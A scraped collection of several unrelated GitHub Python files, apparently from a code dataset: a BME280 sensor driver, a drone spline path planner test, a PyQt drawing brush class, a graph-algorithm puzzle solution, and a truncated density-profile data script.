<< 7):\n\t\t\tvalue -= 1 << 8\n\t\treturn value\n\n\nclass S16Adapter(Adapter):\n\t\"\"\"Convert unsigned 16bit integer to signed.\"\"\"\n\n\tdef _decode(self, value):\n\t\treturn struct.unpack('> 4) & 0x0F) | (b[1] << 4)\n\t\tif r & (1 << 11):\n\t\t\tr = r - 1 << 12\n\t\treturn r\n\n\nclass H4Adapter(S16Adapter):\n\tdef _decode(self, value):\n\t\tb = _int_to_bytes(value, 2)\n\t\tr = (b[0] << 4) | (b[1] & 0x0F)\n\t\tif r & (1 << 11):\n\t\t\tr = r - 1 << 12\n\t\treturn r\n\n\nclass BME280Calibration():\n\tdef __init__(self):\n\t\tself.dig_t1 = 0\n\t\tself.dig_t2 = 0\n\t\tself.dig_t3 = 0\n\n\t\tself.dig_p1 = 0\n\t\tself.dig_p2 = 0\n\t\tself.dig_p3 = 0\n\t\tself.dig_p4 = 0\n\t\tself.dig_p5 = 0\n\t\tself.dig_p6 = 0\n\t\tself.dig_p7 = 0\n\t\tself.dig_p8 = 0\n\t\tself.dig_p9 = 0\n\n\t\tself.dig_h1 = 0\n\t\tself.dig_h2 = 0\n\t\tself.dig_h3 = 0\n\t\tself.dig_h4 = 0\n\t\tself.dig_h5 = 0\n\t\tself.dig_h6 = 0\n\n\t\tself.temperature_fine = 0\n\t\t\n\t\t\n\t\n\t\n\tdef compensate_temperature(self, raw_temperature):\n\t\tvar1 = (raw_temperature / 16384.0 - self.dig_t1 / 1024.0) * self.dig_t2\n\t\tvar2 = raw_temperature / 131072.0 - self.dig_t1 / 8192.0\n\t\tvar2 = var2 * var2 * self.dig_t3\n\t\tself.temperature_fine = (var1 + var2) \n\t\treturn self.temperature_fine / 5120.0\n\n\tdef compensate_pressure(self, raw_pressure):\n\t\tvar1 = self.temperature_fine / 2.0 - 64000.0\n\t\tvar2 = var1 * var1 * self.dig_p6 / 32768.0\n\t\tvar2 = var2 + var1 * self.dig_p5 * 2\n\t\tvar2 = var2 / 4.0 + self.dig_p4 * 65536.0\n\t\tvar1 = (self.dig_p3 * var1 * var1 / 524288.0 + self.dig_p2 * var1) / 524288.0\n\t\tvar1 = (1.0 + var1 / 32768.0) * self.dig_p1\n\t\tpressure = 1048576.0 - raw_pressure\n\t\tpressure = (pressure - var2 / 4096.0) * 6250.0 / var1\n\t\tvar1 = self.dig_p9 * pressure * pressure / 2147483648.0\n\t\tvar2 = pressure * self.dig_p8 / 32768.0\n\t\treturn pressure + (var1 + var2 + self.dig_p7) / 16.0\n\n\tdef compensate_humidity(self, raw_humidity):\n\t\thumidity = self.temperature_fine - 76800.0\n\t\thumidity = (raw_humidity - (self.dig_h4 * 64.0 + self.dig_h5 / 16384.0 * humidity)) * (self.dig_h2 / 65536.0 * (1.0 + self.dig_h6 / 67108864.0 * humidity * (1.0 + self.dig_h3 / 67108864.0 * humidity)))\n\t\thumidity = humidity * (1.0 - self.dig_h1 * humidity / 524288.0)\n\t\treturn max(0.0, min(100.0, humidity))\n\n\nclass BME280_new:\n\tdef __init__(self, i2c_addr=I2C_ADDRESS_GND, i2c_dev=None):\n\t\tself.calibration = BME280Calibration()\n\t\t\n\t\t\n\t\tself._is_setup = False\n\t\tself._i2c_addr = i2c_addr\n\t\tself._i2c_dev = i2c_dev\n\t\tself._bme280 = Device([I2C_ADDRESS_GND, I2C_ADDRESS_VCC], i2c_dev=self._i2c_dev, bit_width=8, registers=(\n\t\t\tRegister('CHIP_ID', 0xD0, fields=(\n\t\t\t\tBitField('id', 0xFF),\n\t\t\t)),\n\t\t\tRegister('RESET', 0xE0, fields=(\n\t\t\t\tBitField('reset', 0xFF),\n\t\t\t)),\n\t\t\tRegister('STATUS', 0xF3, fields=(\n\t\t\t\tBitField('measuring', 0b00001000), # 1 when conversion is running\n\t\t\t\tBitField('im_update', 0b00000001), # 1 when NVM data is being copied\n\t\t\t)),\n\t\t\tRegister('CTRL_MEAS', 0xF4, fields=(\n\t\t\t\tBitField('osrs_t', 0b11100000, # Temperature oversampling\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 1: 0b001,\n\t\t\t\t\t\t\t 2: 0b010,\n\t\t\t\t\t\t\t 4: 0b011,\n\t\t\t\t\t\t\t 8: 0b100,\n\t\t\t\t\t\t\t 16: 0b101\n\t\t\t\t\t\t })),\n\t\t\t\tBitField('osrs_p', 0b00011100, # Pressure oversampling\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 1: 0b001,\n\t\t\t\t\t\t\t 2: 0b010,\n\t\t\t\t\t\t\t 4: 0b011,\n\t\t\t\t\t\t\t 8: 0b100,\n\t\t\t\t\t\t\t 16: 0b101})),\n\t\t\t\tBitField('mode', 0b00000011, # Power mode\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 'sleep': 0b00,\n\t\t\t\t\t\t\t 'forced': 0b10,\n\t\t\t\t\t\t\t 'normal': 0b11})),\n\t\t\t)),\n\t\t\tRegister('CTRL_HUM', 0xF2, fields=(\n\t\t\t\tBitField('osrs_h', 0b00000111, # Humidity oversampling\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 1: 0b001,\n\t\t\t\t\t\t\t 2: 0b010,\n\t\t\t\t\t\t\t 4: 0b011,\n\t\t\t\t\t\t\t 8: 0b100,\n\t\t\t\t\t\t\t 16: 0b101})),\n\t\t\t)),\n\t\t\tRegister('CONFIG', 0xF5, fields=(\n\t\t\t\tBitField('t_sb', 0b11100000, # Temp standby duration in normal mode\n\t\t\t\t\t\t adapter=LookupAdapter({\n\t\t\t\t\t\t\t 0.5: 0b000,\n\t\t\t\t\t\t\t 62.5: 0b001,\n\t\t\t\t\t\t\t 125: 0b010,\n\t\t\t\t\t\t\t 250: 0b011,\n\t\t\t\t\t\t\t 500: 0b100,\n\t\t\t\t\t\t\t 1000: 0b101,\n\t\t\t\t\t\t\t 10: 0b110,\n\t\t\t\t\t\t\t 20: 0b111})),\n\t\t\t\tBitField('filter', 0b00011100), # Controls the time constant of the IIR filter\n\t\t\t\tBitField('spi3w_en', 0b0000001, read_only=True), # Enable 3-wire SPI interface when set to 1. IE: Don't set this bit!\n\t\t\t)),\n\t\t\tRegister('DATA', 0xF7, fields=(\n\t\t\t\tBitField('humidity', 0x000000000000FFFF),\n\t\t\t\tBitField('temperature', 0x000000FFFFF00000),\n\t\t\t\tBitField('pressure', 0xFFFFF00000000000)\n\t\t\t), bit_width=8 * 8),\n\t\t\tRegister('CALIBRATION', 0x88, fields=(\n\t\t\t\tBitField('dig_t1', 0xFFFF << 16 * 12, adapter=U16Adapter()), # 0x88 0x89\n\t\t\t\tBitField('dig_t2', 0xFFFF << 16 * 11, adapter=S16Adapter()), # 0x8A 0x8B\n\t\t\t\tBitField('dig_t3', 0xFFFF << 16 * 10, adapter=S16Adapter()), # 0x8C 0x8D\n\t\t\t\tBitField('dig_p1', 0xFFFF << 16 * 9, adapter=U16Adapter()), # 0x8E 0x8F\n\t\t\t\tBitField('dig_p2', 0xFFFF << 16 * 8, adapter=S16Adapter()), # 0x90 0x91\n\t\t\t\tBitField('dig_p3', 0xFFFF << 16 * 7, adapter=S16Adapter()), # 0x92 0x93\n\t\t\t\tBitField('dig_p4', 0xFFFF << 16 * 6, adapter=S16Adapter()), # 0x94 0x95\n\t\t\t\tBitField('dig_p5', 0xFFFF << 16 * 5, adapter=S16Adapter()), # 0x96 0x97\n\t\t\t\tBitField('dig_p6', 0xFFFF << 16 * 4, adapter=S16Adapter()), # 0x98 0x99\n\t\t\t\tBitField('dig_p7', 0xFFFF << 16 * 3, adapter=S16Adapter()), # 0x9A 0x9B\n\t\t\t\tBitField('dig_p8', 0xFFFF << 16 * 2, adapter=S16Adapter()), # 0x9C 0x9D\n\t\t\t\tBitField('dig_p9', 0xFFFF << 16 * 1, adapter=S16Adapter()), # 0x9E 0x9F\n\t\t\t\tBitField('dig_h1', 0x00FF), # 0xA1 uint8\n\t\t\t), bit_width=26 * 8),\n\t\t\tRegister('CALIBRATION2', 0xE1, fields=(\n\t\t\t\tBitField('dig_h2', 0xFFFF0000000000, adapter=S16Adapter()), # 0xE1 0xE2\n\t\t\t\tBitField('dig_h3', 0x0000FF00000000), # 0xE3 uint8\n\t\t\t\tBitField('dig_h4', 0x000000FFFF0000, adapter=H4Adapter()), # 0xE4 0xE5[3:0]\n\t\t\t\tBitField('dig_h5', 0x00000000FFFF00, adapter=H5Adapter()), # 0xE5[7:4] 0xE6\n\t\t\t\tBitField('dig_h6', 0x000000000000FF, adapter=S8Adapter()) # 0xE7 int8\n\t\t\t), bit_width=7 * 8)\n\t\t))\n\n\tdef setup(self, mode='normal', temperature_oversampling=16, pressure_oversampling=16, humidity_oversampling=16, temperature_standby=500):\n\t\tif self._is_setup:\n\t\t\treturn\n\t\tself._is_setup = True\n\n\t\tself._bme280.select_address(self._i2c_addr)\n\t\tself._mode = mode\n\t\t\n\n\t\tif mode == \"forced\":\n\t\t\tmode = \"sleep\"\n\n\t\ttry:\n\t\t\tif self._bme280.CHIP_ID.get_id() != CHIP_ID:\n\t\t\t\traise RuntimeError(\"Unable to find bme280 on 0x{:02x}, CHIP_ID returned {:02x}\".format(self._i2c_addr, self._bme280.CHIP_ID.get_id()))\n\t\texcept IOError:\n\t\t\traise RuntimeError(\"Unable to find bme280 on 0x{:02x}, IOError\".format(self._i2c_addr))\n\n\t\tself._bme280.RESET.set_reset(0xB6)\n\t\ttime.sleep(0.1)\n\n\t\tself._bme280.CTRL_HUM.set_osrs_h(humidity_oversampling)\n\n\t\twith self._bme280.CTRL_MEAS as CTRL_MEAS:\n\t\t\tCTRL_MEAS.set_mode(mode)\n\t\t\tCTRL_MEAS.set_osrs_t(temperature_oversampling)\n\t\t\tCTRL_MEAS.set_osrs_p(pressure_oversampling)\n\t\t\tCTRL_MEAS.write()\n\n\t\twith self._bme280.CONFIG as CONFIG:\n\t\t\tCONFIG.set_t_sb(temperature_standby)\n\t\t\tCONFIG.set_filter(2)\n\t\t\tCONFIG.write()\n\n\t\twith self._bme280.CALIBRATION as CALIBRATION:\n\t\t\tself.calibration.dig_t1 = CALIBRATION.get_dig_t1()\n\t\t\tself.calibration.dig_t2 = CALIBRATION.get_dig_t2()\n\t\t\tself.calibration.dig_t3 = CALIBRATION.get_dig_t3()\n\n\t\t\tself.calibration.dig_p1 = CALIBRATION.get_dig_p1()\n\t\t\tself.calibration.dig_p2 = CALIBRATION.get_dig_p2()\n\t\t\tself.calibration.dig_p3 = CALIBRATION.get_dig_p3()\n\t\t\tself.calibration.dig_p4 = CALIBRATION.get_dig_p4()\n\t\t\tself.calibration.dig_p5 = CALIBRATION.get_dig_p5()\n\t\t\tself.calibration.dig_p6 = CALIBRATION.get_dig_p6()\n\t\t\tself.calibration.dig_p7 = CALIBRATION.get_dig_p7()\n\t\t\tself.calibration.dig_p8 = CALIBRATION.get_dig_p8()\n\t\t\tself.calibration.dig_p9 = CALIBRATION.get_dig_p9()\n\n\t\t\tself.calibration.dig_h1 = CALIBRATION.get_dig_h1()\n\n\t\twith self._bme280.CALIBRATION2 as CALIBRATION:\n\t\t\tself.calibration.dig_h2 = CALIBRATION.get_dig_h2()\n\t\t\tself.calibration.dig_h3 = CALIBRATION.get_dig_h3()\n\t\t\tself.calibration.dig_h4 = CALIBRATION.get_dig_h4()\n\t\t\tself.calibration.dig_h5 = CALIBRATION.get_dig_h5()\n\t\t\tself.calibration.dig_h6 = CALIBRATION.get_dig_h6()\n\n\t\n\t\t\n\tdef update_sensor(self):\n\t\tself.setup()\n\n\t\tif self._mode == \"forced\":\n\t\t\t# Trigger a reading in forced mode and wait for result\n\t\t\tself._bme280.CTRL_MEAS.set_mode(\"forced\")\n\t\t\twhile self._bme280.STATUS.get_measuring():\n\t\t\t\ttime.sleep(0.001)\n\n\t\twith self._bme280.DATA as DATA:\n\t\t\traw_temperature = DATA.get_temperature()\n\t\t\traw_pressure = DATA.get_pressure()\n\t\t\traw_humidity = DATA.get_humidity()\n\n\t\tself.temperature = self.calibration.compensate_temperature(raw_temperature)\n\t\tself.pressure = self.calibration.compensate_pressure(raw_pressure) / 100.0\n\t\tself.humidity = self.calibration.compensate_humidity(raw_humidity)\n\t\treturn (self.temperature, self.pressure, self.humidity) # TheHWcave: added return values\n\n\tdef get_temperature(self):\n\t\tself.update_sensor()\n\t\treturn self.temperature\n\n\tdef get_pressure(self):\n\t\tself.update_sensor()\n\t\treturn self.pressure\n\n\tdef get_humidity(self):\n\t\tself.update_sensor()\n\t\treturn self.humidity\n\n\tdef get_altitude(self, qnh=1013.25):\n\t\tself.update_sensor()\n\t\tpressure = self.get_pressure()\n\t\taltitude = 44330.0 * (1.0 - pow(pressure / qnh, (1.0 / 5.255)))\n\t\treturn altitude\n","repo_name":"TheHWcave/Enviro-Plus","sub_path":"review-part1/BME280_new.py","file_name":"BME280_new.py","file_ext":"py","file_size_in_byte":9874,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"19876024819","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom spline import QuinticSpline\n\ndef plot_spline(spline, ax, **kwargs):\n # type: (QuinticSpline, Axes3D, **dict) -> None\n t = np.linspace(0, 1, 100)\n points = np.array([spline.evaluate(x) for x in t])\n xs = points[:, 0]\n ys = points[:, 1]\n zs = points[:, 2]\n ax.plot(xs, ys, zs=zs, **kwargs)\n\ndef propose_geometric_spline_path(p1, p2, p3, t1 = None, t3 = None, a1 = None, a3 = None):\n # type: (np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray) -> list[QuinticSpline]\n direct12 = p2 - p1\n direct23 = p3 - p2\n\n # default t1 and t3 is the same as the direction of p1 -> p2 and p2 -> p3. \n # default a1 and a3 is 0\n if t1 is None:\n t1 = 0.5 * direct12\n if t3 is None:\n t3 = 0.5 * direct23\n if a1 is None:\n a1 = np.array([0, 0, 0], dtype=np.float)\n if a3 is None:\n a3 = np.array([0, 0, 0], dtype=np.float)\n \n norm_12 = np.linalg.norm(direct12)\n norm_23 = np.linalg.norm(direct23)\n t2 = direct12 / norm_12\n\n axis = np.cross(direct12, direct23)\n axis /= np.linalg.norm(axis)\n angle = np.arccos(np.dot(direct12, direct23) / (norm_12 * norm_23)) / 2\n # by Rodrigues' rotation formula\n t2 = np.cos(angle) * t2 + np.sin(angle) * np.cross(axis, t2) + (1 - np.cos(angle)) * np.dot(axis, t2) * axis\n t2 *= (min(norm_12, norm_23))\n # see Sprunk[2008] ch4.1.2 for reference\n alpha = norm_23 / (norm_12 + norm_23)\n beta = norm_12 / (norm_12 + norm_23)\n a2 = alpha * (6 * p1 + 2 * t1 + 4 * t2 - 6 * p2) + beta * (-6 * p2 - 4 * t2 - 2 * t3 + 6 * p3)\n\n return [QuinticSpline(p1, p2, t1, t2, a1, a2),\n QuinticSpline(p2, p3, t2, t3, a2, a3)]\n\ndef sample_path(path, ds = 0.1, samples_per_seg = 300):\n # type: (List[QuinticSpline], float, int) -> List[object]\n num_seg = len(path)\n t = np.linspace(0, 1, samples_per_seg)\n samples = []\n for i in range(num_seg):\n for x in t:\n samples.append((x + i, path[i].evaluate_with_derivatives(x)))\n # perform numeric integral to the the approximated curve length\n last_t, (pt, d1, d2) = samples[0]\n last_d1_norm = np.linalg.norm(d1)\n last_s = 0\n \n result = []\n result.append(((0, 0), (pt, d1, d2)))\n\n s = 0\n for t, (pt, d1, d2) in samples[1:]:\n print(s)\n d1_norm = np.linalg.norm(d1)\n s += (0.5 * (d1_norm + last_d1_norm) * (t - last_t))\n last_d1_norm = d1_norm\n last_t = t\n\n if s - last_s >= ds:\n last_s = s\n result.append(((s, t), (pt, d1, d2)))\n\n return result\n\nif __name__ == '__main__':\n points = np.array([\n [18.0, -23.0, 5.3],\n [18.15111, 3.631447, 6.3064975],\n [16.749825, 39.56997, 6.7624995],\n [2.32982075, 27.86797, 2.54649985],\n [2.199832, 9.001728, 1.99375],\n [-7.308671, -12.13678, 3.229941],\n [-7.61018, -28.472035, 2.6425],\n [-9.0005400e-03, -3.3913000e+01, 2.1031115e+00],\n [5.8678205, -28.440035, 2.56749995],\n [7.249821, -11.79203, 2.54649985],\n [-9.32867, 7.773174, 2.019941],\n [-9.148669, 30.62316, 2.897941]\n ])\n s1, s2 = propose_geometric_spline_path(points[0], points[1], points[2])\n fig = plt.figure()\n ax = Axes3D(fig)\n plot_spline(s1, ax, c='r')\n plot_spline(s2, ax, c='g')\n ax.plot(points[:3, 0], points[:3, 1], points[:3, 2], c='b')\n ax.scatter3D(points[0][0], points[0][1], points[0][2], marker='x')\n ax.scatter3D(points[1][0], points[1][1], points[1][2], marker='x') \n ax.scatter3D(points[2][0], points[2][1], points[2][2], marker='x')\n waypoints = sample_path((s1, s2), 1)\n\n xs = []\n ys = []\n zs = []\n for (_,_), (pt,_,_) in waypoints:\n xs.append(pt[0])\n ys.append(pt[1])\n zs.append(pt[2])\n ax.scatter3D(xs, ys, zs, marker='o', c='orange')\n plt.show()\n","repo_name":"Veilkrand/drone_race","sub_path":"spline_planner/scripts/planner_test.py","file_name":"planner_test.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"34473132278","text":"import math\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n\nclass Brush:\n\n DRAW_MODES = {\n \"add\": QPainter.CompositionMode_SourceOver,\n \"replace\": QPainter.CompositionMode_Source,\n \"multiply\": QPainter.CompositionMode_Multiply,\n \"light(soft)\": QPainter.CompositionMode_SoftLight,\n \"light(hard)\": QPainter.CompositionMode_HardLight,\n #\"lighten\": QPainter.CompositionMode_Lighten,\n #\"darken\": QPainter.CompositionMode_Lighten,\n \"difference\": QPainter.CompositionMode_Difference,\n }\n\n DRAW_TOOLS = {\n \"fill\",\n \"swipe\",\n }\n\n def __init__(self):\n self.mode = \"select\"\n self.fill_tolerance = 0\n self._radius = 2\n self._color = QColor(255, 255, 255)\n self._alpha = 255\n self._brush = None\n self._brush_qimage = None\n\n @property\n def radius(self):\n return self._radius\n\n @property\n def color(self):\n return self._color\n\n @property\n def alpha(self):\n return self._alpha\n\n def is_brush(self):\n return self.mode in self.DRAW_MODES\n\n def is_draw_tool(self):\n return self.mode in self.DRAW_MODES or self.mode in self.DRAW_TOOLS\n\n def set_radius(self, r):\n self._radius = int(r)\n self._brush_qimage = None\n\n def set_mode(self, m):\n self.mode = m\n\n def set_color(self, c):\n self._color = c\n self._brush_qimage = None\n\n def set_alpha(self, a):\n self._alpha = max(0, min(255, a))\n self._brush_qimage = None\n\n def set_fill_tolerance(self, t):\n self.fill_tolerance = t\n\n def draw(self, pos, qimage, clip_rect=None):\n assert self.mode in self.DRAW_MODES\n\n r = self._radius - .5\n center = pos - QPointF(r, r)\n p = QPainter(qimage)\n if clip_rect is not None:\n p.setClipRect(clip_rect)\n p.setCompositionMode(self.DRAW_MODES[self.mode])\n\n p.drawImage(center, self.brush_image)\n\n def swipe(self, pos1, pos2, qimage, clip_rect=None):\n src = QImage(self.radius*2+1, self.radius*2+1, QImage.Format_RGBA8888)\n cx = src.width() / 2 - .5\n cy = src.height() / 2 - .5\n srcx = pos1.x() - self.radius\n srcy = pos1.y() - self.radius\n alpha = self.alpha / 255.\n for y in range(src.height()):\n sy = max(0, min(qimage.height()-1, srcy + y))\n if clip_rect is not None:\n if sy < clip_rect.top():\n sy = clip_rect.top()\n if sy > clip_rect.bottom():\n sy = clip_rect.bottom()\n for x in range(src.width()):\n sx = max(0, min(qimage.width()-1, srcx + x))\n if clip_rect is not None:\n if sx < clip_rect.left():\n sx = clip_rect.left()\n if sx > clip_rect.right():\n sx = clip_rect.right()\n dx, dy = cx-x, cy-y\n d = math.sqrt(dx*dx + dy*dy)\n col = QColor(qimage.pixel(sx, sy))\n col.setAlphaF(alpha * max(0., 1. - d / self.radius) * col.alphaF())\n src.setPixel(x, y, col.rgba())\n\n r = self._radius\n center = pos2 - QPointF(r, r)\n\n p = QPainter(qimage)\n if clip_rect is not None:\n p.setClipRect(clip_rect)\n\n p.drawImage(center, src)\n\n def flood_fill(self, pos, qimage, clip_rect=None):\n orgpix = qimage.pixelColor(pos)\n orgpix = (orgpix.red(), orgpix.green(), orgpix.blue())\n todo = {(pos.x(), pos.y())}\n visited = set()\n\n def _check(p):\n if p in visited:\n return False\n c = qimage.pixelColor(p[0], p[1])\n d = (abs(orgpix[0] - c.red()) + abs(orgpix[1] - c.green()) + abs(orgpix[2] - c.blue())) / 3\n return d <= self.fill_tolerance\n\n while todo:\n pos = todo.pop()\n visited.add(pos)\n if pos[0] + 1 < qimage.width():\n if clip_rect is None or pos[0] + 1 <= clip_rect.right():\n p = (pos[0]+1, pos[1])\n if _check(p):\n todo.add(p)\n if pos[1] + 1 < qimage.height():\n if clip_rect is None or pos[1] + 1 <= clip_rect.bottom():\n p = (pos[0], pos[1]+1)\n if _check(p):\n todo.add(p)\n if pos[0] - 1 >= 0:\n if clip_rect is None or pos[0] - 1 >= clip_rect.left():\n p = (pos[0]-1, pos[1])\n if _check(p):\n todo.add(p)\n if pos[1] - 1 >= 0:\n if clip_rect is None or pos[1] - 1 >= clip_rect.top():\n p = (pos[0], pos[1]-1)\n if _check(p):\n todo.add(p)\n\n for p in visited:\n qimage.setPixel(p[0], p[1], self.color.rgba())\n\n @property\n def brush_image(self):\n if self._brush_qimage is None:\n self._brush_qimage = self._create_brush_qimage(self._color)\n return self._brush_qimage\n\n def _create_brush_qimage(self, color):\n image = QImage((self._radius-1)*2+1, (self._radius-1)*2+1, QImage.Format_RGBA8888)\n cx = image.width() / 2 - .5\n cy = image.height() / 2 - .5\n alpha = self.alpha / 255.\n for y in range(image.height()):\n for x in range(image.width()):\n dx, dy = cx-x, cy-y\n d = math.sqrt(dx*dx + dy*dy)\n col = QColor(color)\n col.setAlphaF(alpha * max(0., 1.- d / self.radius) * col.alphaF())\n image.setPixel(x, y, col.rgba())\n return image","repo_name":"defgsus/thegame","sub_path":"lib/editor/tileset/Brush.py","file_name":"Brush.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7304853198","text":"# 악덕 영주 혜유 [Gold 2]\nimport sys\nimport heapq as hq\nI = sys.stdin.readline\n\nn,m = map(int,I().split())\nroutes = []\nresult = 0\nfarthest = 0\n\nfor _ in range(m):\n a,b,c = map(int,I().split())\n routes.append((a,b,c))\n\n\nroutes.sort(key=lambda x:x[2])\ngraph = [[]for _ in range(n)]\nparent = [i for i in range(n)]\n\n\ndef find(parent,x):\n if x != parent[x]:\n parent[x] = find(parent,parent[x])\n return parent[x]\n\ndef union(parent,a,b):\n a = find(parent,a)\n b = find(parent,b)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\ndef da(s):\n distance = [int(1e10)]*n\n distance[s] = 0\n q = []\n hq.heappush(q,(0,s))\n while q:\n dist, now = hq.heappop(q)\n if distance[now] < dist:\n continue\n\n for i in graph[now]:\n cost = dist+i[1]\n\n if distance[i[0]] > cost:\n distance[i[0]] = cost\n hq.heappush(q,(cost,i[0]))\n\n return distance\n\nfor a,b,cost in routes:\n if find(parent,a) != find(parent,b):\n union(parent,a,b)\n graph[a].append((b,cost))\n graph[b].append((a,cost))\n result += cost\n\n\nfor i in range(n):\n farthest = max(farthest,max(da(i)))\n\nprint(result)\nprint(farthest)","repo_name":"dlwhd990/BOJ-2022","sub_path":"BOJ/[20010]악덕영주혜유.py","file_name":"[20010]악덕영주혜유.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12719495021","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 25 10:08:12 2021\r\n\r\n@author: THMEI4\r\n\"\"\"\r\n\r\n#%%\r\nimport glob\r\nimport xmltodict as xml\r\nimport pandas as pd\r\nimport os\r\nimport re\r\n\r\n#%%Input needed\r\n#Place all files per group/material in 1 folde\r\nSource = 'Here the directory of where the folder with .dl1 files is'\r\nFolder = 'Folder name of .dl1 files here'\r\nNameoutput=Folder\r\n\r\nArrangedata=0 #Highest peak at 1 side\r\nMeanoutput=1 #Give mean profile as output\r\nMeanfrommiddle=0 #Give mean profile with \"centered\" data\r\nHeaderoutput=1 #give header as output\r\n\r\nInputfolder=Source+Folder+'/'\r\n#%%Arrange data\r\nFolders = os.listdir(Inputfolder)\r\ndef myround(x, base=0.05):\r\n return base * round(x/base)\r\n\r\ndf=[]\r\nheader=[]\r\nfor i in Folders:\r\n \r\n for filename in glob.glob(os.path.join(Inputfolder+i, '*.dl1')):\r\n with open(os.path.join(os.getcwd(), filename), 'r') as f: # open in readonly mode\r\n raw_data = xml.parse(f.read())\r\n data = pd.DataFrame(raw_data['DensityProfil']['Profile'])\r\n head= raw_data['DensityProfil']['Header']\r\n head=pd.DataFrame(head, columns=head.keys(),index=[0])\r\n head=head.iloc[: , :5]\r\n #head['Hour']=int(re.sub(\"[^0-9]\", \"\", Folder))\r\n head['sample']=filename.replace(Inputfolder+i[0],'')\r\n head['Type']=filename.replace(Inputfolder,'')[:filename.replace(Inputfolder,'').find('\\\\')]\r\n head['File']=filename\r\n #data['Hour']=int(re.sub(\"[^0-9]\", \"\", Folder))\r\n data['sample']=filename.replace(Inputfolder+i[0],'')\r\n data['Type']=filename.replace(Inputfolder,'')[:filename.replace(Inputfolder,'').find('\\\\')]\r\n data['File']=filename\r\n half=(data['x-Value'].astype(float).max()*0.5)\r\n Yperc=min(data['x-Value'].astype(float), key=lambda x:abs(x-half))\r\n data['Xcenter']=data['x-Value'].astype(float)-Yperc\r\n header.append(head)\r\n df.append(data)\r\ndf = pd.concat(df)\r\nheader=pd.concat(header)\r\ndf['x-Value']=df['x-Value'].astype(float)\r\ndf['y-Value']=df['y-Value'].astype(float)\r\ndf = df.rename(columns={'x-Value': 'X', 'y-Value': 'Y'})\r\n\r\n\r\ndf['Xround']=myround(df['X'])\r\ndf['XroundC']=myround(df['Xcenter'])\r\n\r\n#%%Putting high peak first\r\n\r\nif Arrangedata==1:\r\n average=[]\r\n\r\n compoundData = df.groupby(['File'])\r\n fitData = []\r\n for name,group in compoundData:\r\n File= name\r\n curfit=dict(zip(['File'],[File]))\r\n curfit['Peakleft']=group.Y[group.X<=(group.X.max()*0.5)].max()\r\n curfit['Peakright']=group.Y[group.X>=(group.X.max()*0.5)].max()\r\n curfit['Peakmax']=max(group.Y[group.X<=(group.X.max()*0.5)].max(),group.Y[group.X>(group.X.max()*0.5)].max())\r\n curfit['Thickness']=group.X.max()\r\n fitData.append(curfit)\r\n fitCompound = [ item['File'] for item in fitData]\r\n fitData=pd.DataFrame(fitData)\r\n fitData\r\n\r\n dfarranged = pd.merge(df,\r\n fitData,\r\n on ='File',\r\n how ='inner')\r\n dfarranged['X_left']=myround(dfarranged['X'][dfarranged['Peakleft']==dfarranged['Peakmax']])\r\n dfarranged['X_right']=myround((dfarranged['X'][dfarranged['Peakright']==dfarranged['Peakmax']]-dfarranged['Thickness'][dfarranged['Peakright']==dfarranged['Peakmax']])*-1)\r\n dfarranged['X_x']=dfarranged['X_right'].combine_first(dfarranged['X_left'])\r\n dfarranged=dfarranged[['Type','Hour','File', 'X','X_x','Y']].copy()\r\n dfarranged = dfarranged.rename(columns={'X':'Xoriginal','X_x': 'Xround'})\r\n \r\n outputlocation=Inputfolder+\"/\"+Nameoutput+\"arranged.xlsx\"\r\n writer = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\n df.to_excel(writer, sheet_name='Sheet1')\r\n writer.save()\r\n\r\n#%%Calculating mean curve\r\nif Meanoutput==1:\r\n y=df.groupby(['Type'])\r\n\r\n Mean=[]\r\n for i in y:\r\n Meanprofile=i[1].groupby(['Xround'])['Y'].mean()\r\n Meanprofile=pd.DataFrame(Meanprofile)\r\n Meanprofile=Meanprofile.reset_index()\r\n Meanprofile.rename(columns={ Meanprofile.columns[1]: \"Y\" }, inplace = True)\r\n Meanprofile['Type']=i[0]\r\n #Meanprofile['Hour']=i[1]['Hour'].mean()\r\n xmin=max(df.groupby(['File'])['Xround'].min())\r\n xmax=min(df.groupby(['File'])['Xround'].max())\r\n #Meanprofile=Meanprofile[(Meanprofile['Xround']>=xmin ) & (Meanprofile['Xround']<=xmax)]\r\n Meanprofile['Folder']=Folder\r\n Mean.append(Meanprofile)\r\n Meanprofile=pd.concat(Mean,axis=0)\r\n if Meanfrommiddle==1:\r\n y=df.groupby(['Type'])\r\n\r\n Mean=[]\r\n for i in y:\r\n Meanprofile=i[1].groupby(['XroundC'])['Y'].mean()\r\n Meanmin=i[1].groupby(['File'])['XroundC'].min().mean()\r\n Meanmax=i[1].groupby(['File'])['XroundC'].max().mean()\r\n Meanprofile=pd.DataFrame(Meanprofile)\r\n Meanprofile=Meanprofile.reset_index()\r\n Meanprofile.rename(columns={ Meanprofile.columns[1]: \"Y\" }, inplace = True)\r\n Meanprofile['Type']=i[0]\r\n #Meanprofile['Hour']=i[1]['Hour'].mean()\r\n xmin=max(df.groupby(['File'])['XroundC'].min())\r\n xmax=min(df.groupby(['File'])['XroundC'].max())\r\n #Meanprofile=Meanprofile[(Meanprofile['Xround']>=xmin ) & (Meanprofile['Xround']<=xmax)]\r\n Meanprofile['Folder']=Folder\r\n Meanprofile=Meanprofile[(Meanprofile['XroundC']<=Meanmax)&(Meanprofile['XroundC']>=Meanmin)]\r\n 